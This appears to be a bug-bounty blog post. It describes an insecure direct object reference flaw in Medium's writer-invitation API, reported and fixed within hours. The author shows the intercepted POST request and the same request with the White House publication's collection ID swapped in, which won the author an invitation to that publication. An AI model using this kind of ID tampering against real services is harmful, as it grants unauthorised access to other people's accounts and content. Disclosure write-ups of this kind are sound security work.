Image from http://www.wellesley.edu While I was riding home with an Uber, I received an email from Medium about its 5 new features. One of those is the feature. Invite Writers Email from Medium They’ve got new features so there’s a possibility that there’s a issues. Then, I started testing the new feature by inviting my second email in my own publication to test how does the feature works. While doing the inviting process, I opened a tool and intercepted the POST Request then I got this: security HTTP POST /_/api/collections/ /invited-authors HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brX-Obvious-CID: webX-XSRF-Token: NDZnMsyhRddws0sVX-Client-Date: 1479216955226Content-Type: application/jsonReferer: Content-Length: 41Cookie: {Redacted}Connection: close 62fcbc0a9209 medium.com https://medium.com/secuna/edit {“email”:”example@domain.com”} Look at the top line of the code and find the value after /collections/. is the Collection ID of and it quickly reminds me that this kind of request is possibly vulnerable to or also known as . So, without hesitation I searched for The White House’s Medium Publication and grabbed its Collection ID. 62fcbc0a9209 Secuna Insecure Direct Object Reference IDOR The White House’s Collection ID: 51210352003f After grabbing the Collection ID of The White House, I modified the HTTP Post Request and change the Collection ID from my publication’s collection ID to The White House’s Collection ID. POST /_/api/collections/ /invited-authors HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brX-Obvious-CID: webX-XSRF-Token: NDZnMsyhRddws0sVX-Client-Date: 1479216955226Content-Type: application/jsonReferer: Content-Length: 41Cookie: {Redacted}Connection: close 51210352003f medium.com https://medium.com/secuna/edit {“email”:”example@domain.com”} Then I submitted the HTTP POST Request above and I got a HTTP Response which means, I successfully invited myself as a Writer for The White House’s Medium Publication. 200 OK After 3 seconds, I got an email from medium with an invitation link. Invitation Link from The White House And Wee! After I found the severe security issue, I immediately reported it to Medium’s Security Team. And In just 9 hours, they fixed it and rewarded me with a $250 bounty. I’m happy yet too sad at the same time because they removed me from The White House’s Medium Publication.(haha) Seriously, I am so happy because I helped Medium again making their platform more secure by finding and reporting security vulnerabilities. I’m also the one who found a bug that allows to Update and Delete any Story on Medium.
